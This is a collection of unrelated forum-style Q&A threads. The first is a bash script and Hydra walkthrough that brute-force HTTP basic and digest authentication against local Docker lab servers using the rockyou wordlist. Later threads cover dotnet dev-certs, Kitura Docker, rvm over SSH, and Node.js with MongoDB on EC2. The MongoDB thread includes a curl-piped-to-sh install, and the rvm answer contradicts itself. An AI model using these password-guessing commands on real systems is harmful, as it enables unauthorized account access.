    if curl -s "$3" -c /tmp/cookie --digest -u "$USER:$PASSWORD" | grep -qi "unauth"
    then
      continue
    else
      echo "[+] Found $USER:$PASSWORD"
      exit 0   # exits the script (a cat | while pipeline would only exit its subshell)
    fi
  done < "$2"
done < "$1"
Save this file as app.sh
$ chmod +x app.sh
$ ./app.sh /path/to/users.txt /path/to/passwords.txt http://example.com/path
Since no Hydra version was specified, I assume the latest one: 9.2.
@tbhaxor is correct:
Against a server like Apache or nginx, Hydra works. Flask using digest authentication as recommended in the standard documentation does not work (details later). You could add the web server you used so somebody can verify this.
Hydra does not provide explicit parameters to distinguish between basic and digest authentication.
Technically, it first sends a request that attempts to authenticate itself via basic authentication. After that it evaluates the corresponding response.
The specification of digest authentication states that the web application has to send a WWW-Authenticate: Digest ... header in the response if the requested document is protected using the scheme.
So Hydra can now distinguish between the two forms of authentication.
If it receives this response (cf. code), it sends a second attempt using digest authentication.
The reason why you only see basic auth and not digest requests is the default setting of what Hydra calls "tasks". It is set to 16 by default, which means Hydra initially creates 16 threads.
Thus, if you go to the 17th request in your proxy you will find a request using digest auth. You can also see the difference if you set the number of tasks to 1 with the parameter -t 1.
The following are 3 Docker setups where you can test the differences between basic auth (nginx), digest auth (nginx) and digest auth (Flask) using "admin/password" credentials, based on your example:
basic auth:
cat Dockerfile.http_basic_auth
FROM nginx:1.21.3
LABEL maintainer="secf00tprint"
RUN apt-get update && apt-get install -y apache2-utils
RUN touch /usr/share/nginx/html/.htpasswd
RUN htpasswd -db /usr/share/nginx/html/.htpasswd admin password
RUN sed -i '/^ location \/ {/a \ auth_basic "Administrator\x27s Area";\n\ auth_basic_user_file /usr/share/nginx/html/.htpasswd;' /etc/nginx/conf.d/default.conf
:
sudo docker build -f Dockerfile.http_basic_auth -t http-server-basic-auth .
sudo docker run -ti -p 127.0.0.1:8888:80 http-server-basic-auth
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (nginx):
cat Dockerfile.http_digest
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update && \
# For digest module
DEBIAN_FRONTEND=noninteractive apt-get install -y curl unzip \
# For nginx
build-essential libpcre3 libpcre3-dev zlib1g zlib1g-dev libssl-dev libgd-dev libxml2 libxml2-dev uuid-dev make apache2-utils expect
RUN curl -O https://nginx.org/download/nginx-1.21.3.tar.gz
RUN curl -OL https://github.com/atomx/nginx-http-auth-digest/archive/refs/tags/v1.0.0.zip
RUN tar -xvzf nginx-1.21.3.tar.gz
RUN unzip v1.0.0.zip
RUN cd nginx-1.21.3 && \
./configure --prefix=/usr/share/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/etc/nginx/modules --add-module=../nginx-http-auth-digest-1.0.0/ && \
make && make install
COPY generate.exp /usr/share/nginx/html/
RUN chmod u+x /usr/share/nginx/html/generate.exp && \
cd /usr/share/nginx/html/ && \
expect -d generate.exp
RUN sed -i '/^ location \/ {/a \ auth_digest "this is not for you";' /etc/nginx/nginx.conf
RUN sed -i '/^ location \/ {/i \ auth_digest_user_file /usr/share/nginx/html/passwd.digest;' /etc/nginx/nginx.conf
CMD nginx && tail -f /var/log/nginx/access.log -f /var/log/nginx/error.log
:
cat generate.exp
#!/usr/bin/expect
set timeout 70
spawn "/usr/bin/htdigest" "-c" "passwd.digest" "this is not for you" "admin"
expect "New password: " {send "password\r"}
expect "Re-type new password: " {send "password\r"}
wait
:
sudo docker build -f Dockerfile.http_digest -t http_digest .
sudo docker run -ti -p 127.0.0.1:8888:80 http_digest
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (Flask):
cat Dockerfile.http_digest_flask
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update -y && \
apt-get install -y python3-pip python3-dev
# We copy just the requirements.txt first to leverage Docker cache
COPY ./requirements.txt /app/requirements.txt
WORKDIR /app
RUN pip3 install -r requirements.txt
COPY ./app.py /app/
CMD ["flask", "run", "--host=0.0.0.0"]
:
cat requirements.txt
Flask==2.0.2
Flask-HTTPAuth==4.5.0
:
cat app.py
from flask import Flask
from flask_httpauth import HTTPDigestAuth
app = Flask(__name__)
app.secret_key = 'super secret key'
auth = HTTPDigestAuth()
users = {
"admin" : "password",
"john" : "hello",
"susan" : "bye"
}
@auth.get_password
def get_pw(username):
    if username in users:
        return users.get(username)
    return None

@app.route("/")
@auth.login_required
def hello_world():
    return "<p>Flask Digest Demo</p>"
:
sudo docker build -f Dockerfile.http_digest_flask -t digest_flask .
sudo docker run -ti -p 127.0.0.1:5000:5000 digest_flask
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 5000 http-get /
If you want to see more information I wrote about it in more detail here.

Exporting https certificate fails with 'dotnet dev-certs' tool

I am trying to use the 'dotnet dev-certs' tool to export an https certificate to include with a Docker image. Right now I am using:
dotnet dev-certs https -v -ep $(HOME)\.aspnet\https -p <password>
and I get the error:
Exporting the certificate including the private key.
Writing exported certificate to path 'xxx\.aspnet\https'.
Failed writing the certificate to the target path
Exception message: Access to the path 'xxx\.aspnet\https' is denied.
An error ocurred exporting the certificate.
Exception message: Access to the path 'xxx\.aspnet\https' is denied.
There was an error exporting HTTPS developer certificate to a file.
The problem I see is that no matter what path I supply to export the certificate to I get the same 'Access to the path is denied' error. What am I missing? I know this command has been suggested in numerous places. But I cannot seem to get it to work.
Thank you.
The export path should specify a file, not a directory. This fixed the issue for me on Mac:
dotnet dev-certs https -v -ep ${HOME}/.aspnet/https/aspnetapp.pfx -p <password>
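As a follow-up sketch (the path inside the image and the password are placeholders matching whatever you used above), the exported certificate can then be consumed by Kestrel in the container:
// Inside ConfigureWebHostDefaults(webBuilder => ...) in Program.cs:
webBuilder.ConfigureKestrel(options =>
{
    options.ListenAnyIP(443, listenOptions =>
        listenOptions.UseHttps("/https/aspnetapp.pfx", "<password>"));
});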
For Ubuntu users:
install libnss3-tools:
sudo apt-get update -y
sudo apt-get install -y libnss3-tools
Create the folder below, or verify that it exists on the machine:
$HOME/.pki/nssdb
export the certificate:
dotnet dev-certs https -v -ep ${HOME}/.aspnet/https/aspnetapp.pfx
Run the following commands:
certutil -d sql:$HOME/.pki/nssdb -A -t "P,," -n localhost -i /home/<REPLACE_WITH_YOUR_USER>/.aspnet/https/aspnetapp.pfx
certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n localhost -i /home/<REPLACE_WITH_YOUR_USER>/.aspnet/https/aspnetapp.pfx
exit and restart the browser
Source: https://learn.microsoft.com/en-us/aspnet/core/security/enforcing-ssl?view=aspnetcore-5.0&tabs=visual-studio#ssl-linux
For me the problem was I was using .Net 5 under CentOS 7.8. Uninstalling .Net 5 and using .Net Core 3.1 SDK instead solved the problem.

Run Kitura Docker Image causes libmysqlclient.so.18 Error

After I had a previous problem Dockerising my MySQL Kitura setup here: Docker Build Kitura Sqift Container - Shim.h mysql.h file not found
I am running into a new problem I cannot solve, following the guide from: https://www.kitura.io/docs/deploying/docker.html
After I followed all the steps and also applied the fix for the earlier MySQL issue, I was able to run the following command:
docker run -p 8080:8080 -it myapp-run
This, however, leads to the following issue:
error while loading shared libraries: libmysqlclient.so.18: cannot open shared object file: No such file or directory
I assume something again tries to open libmysqlclient from some wrong environment directories?
But how can I fix this issue when building the Docker image? Is there any way, and ideally a smart way, to do it?
Thanks a lot again for the help.
I was able to update and enhance my Dockerfile; it is now running smoothly and can also be used for CI and CD tasks.
FROM ibmcom/swift-ubuntu-runtime:latest
##FROM ibmcom/swift-ubuntu-runtime:5.0.1
LABEL maintainer="IBM Swift Engineering at IBM Cloud"
LABEL Description="Template Dockerfile that extends the ibmcom/swift-ubuntu-runtime image."
# We can replace this port with what the user wants
EXPOSE 8080
# Default user if not provided
ARG bx_dev_user=root
ARG bx_dev_userid=1000
# Install system level packages
RUN apt-get update && apt-get dist-upgrade -y
RUN apt-get update && apt-get install -y sudo libmysqlclient-dev
# Add utils files
ADD https://raw.githubusercontent.com/IBM-Swift/swift-ubuntu-docker/master/utils/run-utils.sh /swift-utils/run-utils.sh
ADD https://raw.githubusercontent.com/IBM-Swift/swift-ubuntu-docker/master/utils/common-utils.sh /swift-utils/common-utils.sh
RUN chmod -R 555 /swift-utils
# Create user if not root
RUN if [ $bx_dev_user != "root" ]; then useradd -ms /bin/bash -u $bx_dev_userid $bx_dev_user; fi
# Bundle application source & binaries
COPY ./.build /swift-project/.build
# Command to start Swift application
CMD [ "sh", "-c", "cd /swift-project && .build/release/Beautylivery_Server_New" ]

AWS EC2 and rvm ssh

I have created a user (deployer) for my AWS EC2 VPS.
When I log in with:
ssh -i ~/.ssh/aws/*...*.pem ubuntu@ec2*...*.amazonaws.com
the command rvm use 2.0.0 works correctly
=>
ubuntu@ip-***:~$ rvm list
rvm rubies
=* ruby-2.0.0-p247 [ x86_64 ]
# => - current
# =* - current && default
# * - default
ubuntu@ip-***:~$ rvm which
ubuntu@ip-***:~$
But when I use su - deployer I get:
deployer@ip***:/home/ubuntu$ rvm
The program 'rvm' is currently not installed. You can install it by typing:
sudo apt-get install ruby-rvm
I would like to understand how to correctly write the command for the SSH login.
I have tried:
ssh -i ~/.ssh/aws/*.pem ubuntu@ec2***.amazonaws.com -t 'bash --login -c "rvm"'
but received "Connection to ec2-*.amazonaws.com closed".
On my local machine rvm is functioning correctly. I have added
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
into my ~/.bash_profile
I have spent 3-5 hours studying Stack Overflow topics related to this issue, but still do not understand what I am doing wrong.
Any help will be highly appreciated! Thanks in advance!
I've run into this problem before and there are 2 ways to solve it.
The first way is to log in to the instance directly as the deployer user. This might mean having to create an SSH keypair (see ssh-keygen -t rsa). Then you can log in with ssh deployer@ec2.instance.address. This way rvm will be loaded directly in the deployer user's shell.
A second way is not to use the dash when you su to the deployer user account.
When you use the dash you load your own bashrc instead of that particular user's bashrc.
So instead of sudo su deployer
you need to use:
su - deployer
It will ensure you use a login shell.

How can I set up MongoDB on a Node.js server using node-mongodb-native in an EC2 environment?

I got help from many people here, and now I want to contribute back. For those who are having trouble making a Node.js server work with MongoDB, here is what I've done.
This was originally posted by the question asker. A mod asked him in the comments to post it as an answer, but got no response. So, I cleaned it up and am posting it myself.
When you look at the code, you will notice that the createServer code is inside db.open. It won't work if you reverse it. Also, do not close the db connection. Otherwise, after the first time, the db connection will not be opened again. (Of course, db.open is declared outside of createServer.) I have no clue why createServer is inside db.open. I guess it may have to do with not opening too many db connections?
Also, one problem I face is that when I run it via SSH, even if I run the server in the background (e.g. $ node server.js &), after 2.5 hours, the server dies (not the instance though). I am not sure if it is because of terminal connection or what.
Here is the procedure & code
Environment: EC2, AMS-Linux-AMI
Purpose: Take an HTTP request and log the query, IP and timestamp into MongoDB.
Steps
1) After creating the instance (server), install gcc.
$ yum install gcc-c++
2) Download Node.js files and unzip them. (I used version 0.2.6.)
$ curl -O http://nodejs.org/dist/node-v0.2.6.tar.gz
$ tar -xzf node-v0.2.6.tar.gz
I renamed the unzipped folder to just "nodejs"
$ cd nodejs
$ sudo ./configure --without-ssl
$ sudo make
$ sudo make install
make takes a long while.... After that you can try running the sample in nodejs.org
3) Install MongoDB. I installed version 1.6.5, not 1.7.
$ curl -O http://fastdl.mongodb.org/linux/mongodb-linux-x86_64-1.6.5.tgz
$ tar -xzf mongodb-linux-x86_64-1.6.5.tgz
$ sudo mkdir /data/db/r01/
I renamed the folder to "mongodb"
Run the db process:
$ ./mongodb/bin/mongod --dbpath /data/db/r01/
Then if you like, you can run and try out the command line. Refer to MongoDB's website.
4) I recommend that you create your own AMI based on your instance. It will take 20 minutes. Then recreate the install and run MongoDB again.
5) Install node-mongodb-native
$ curl -O https://download.github.com/christkv-node-mongodb-native-V0.8.1-91-g54525d8.tar.gz
$ tar -xzf christkv-node-mongodb-native-V0.8.1-91-g54525d8.tar.gz
I renamed the folder to node-mongodb-native
$ cd node-mongodb-native
$ make
6) Here is the code for the server:
GLOBAL.DEBUG = true;
global.inData = '';
var http = require('http');
sys = require("sys");
/* set up DB */
var Db = require('./node-mongodb-native/lib/mongodb').Db,
Connection = require('./node-mongodb-native/lib/mongodb').Connection,
Server = require('./node-mongodb-native/lib/mongodb').Server,
BSON = require('./node-mongodb-native/lib/mongodb').BSONNative;
var host = process.env['MONGO_NODE_DRIVER_HOST'] != null ? process.env['MONGO_NODE_DRIVER_HOST'] : 'localhost';
var port = process.env['MONGO_NODE_DRIVER_PORT'] != null ? process.env['MONGO_NODE_DRIVER_PORT'] : Connection.DEFAULT_PORT;
var db = new Db('test01', new Server(host, port, {}), {native_parser:true});
db.open(function(err, db) {
  http.createServer(function (req, res) {
    res.writeHead(200, {'Content-Type': 'text/plain'});
    global.inData = {'p':'', 'url':''};
    // get IP address
    var ipAddress = req.connection.remoteAddress;
    global.inData.ip = ipAddress;
    // date time
    var d = new Date();
    var ts = d.valueOf();
    global.inData.ts = ts;
    // get the http query
    var qs = {};
    qs = require('url').parse(req.url, true);
    if (qs.query !== null) {
      for (var key in qs.query) {
        if (key == 'p') {
          global.inData.p = qs.query[key];
        }
        if (key == 'url') {
          global.inData.url = qs.query[key];
        }
      }
    }
    if (global.inData.p == '' && global.inData.url == '') {
      res.end("");
    } else {
      db.collection('clickCount', function(err, collection) {
        if (err) {
          console.log('is error \n' + err);
        }
        collection.insert({'p':global.inData.p,
                           'url':global.inData.url,
                           'ip':global.inData.ip,
                           'ts':global.inData.ts});
        res.end("");
        //db.close(); // DO NOT CLOSE THE CONNECTION
      });
    }
  }).listen(8080);
});
console.log('Server running at whatever host :8080');
This may not be perfect code, but it runs. I'm still not used to the "nested" or LISP kind of coding style. That's why I cheated and used global.inData to pass data along. :)
Don't forget to put res.end("") in the appropriate location (where you think the HTTP request call should be ended).
By the way, the answer I posted above works for CentOS and Fedora.
For people who have Ubuntu, here it is:
# for Gcc
$ sudo apt-get install build-essential
# for SSL
$ sudo apt-get install libssl-dev
Then just install node.js and mongodb as described above.
Also, after a few months of development, I found out that using "npm", "express" and "mongoose" makes my life much easier. I have also installed other tools, like a debugger.
# Install Node Package Manager
$ sudo curl http://npmjs.org/install.sh | sh
# for debugging
$ sudo npm install node-inspector
# for Profiling
$ sudo npm install profile
# Install Express, the Node.js framework
$ sudo npm install express
# Install Template Engines (Now, let’s install Jade, jQuery Templates and EJS. You can pick the one you want)
$ sudo npm install jade jqtpl ejs
# XML related, install node-expat and then node-xml2js-expat
$ sudo apt-get install -y libexpat1-dev
$ sudo npm install node-xml2js
$ sudo npm install xml2js-expat
# Install Mongoose, (Mongo Driver)
$ sudo npm install mongoose
Reference:
http://npmjs.org
http://expressjs.com
http://mongoosejs.com
It looks like there might be a bug. It won't allow me to use a variable for the key in a key:value pair inside collection.insert({...}).
It treats the first argument as the literal key, whether written as 'a' or a - hard-coded either way.
I will look into this and post a fix on GitHub.